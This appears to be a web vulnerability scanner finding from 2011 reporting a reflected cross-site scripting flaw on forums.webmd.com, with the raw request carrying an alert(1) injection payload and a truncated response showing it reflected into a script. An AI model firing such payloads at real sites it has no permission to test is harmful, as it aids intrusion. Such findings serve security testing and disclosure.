1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://forums.webmd.com |
Path: | /favicon.ico |
GET /favicon.ico?c85a0'-alert(1)- Host: forums.webmd.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VisitorId=9195cff2-8bd8 |
HTTP/1.1 200 OK Server: Web Crossing/6.4 MIME-Version: 1.0 Date: Sat, 12 Feb 2011 15:51:24 GMT Expires: -1 Cache-Control: private Content-type: text/html Cteonnt-length: 246 Set-Cookie: NSC_gpsvnt-xfc.dpo:80 Content-Length: 246 <html> <head> <title>404</title> </head> <body> <script type="text/javascript"> location.replace('http:/ </script> ...[SNIP]... |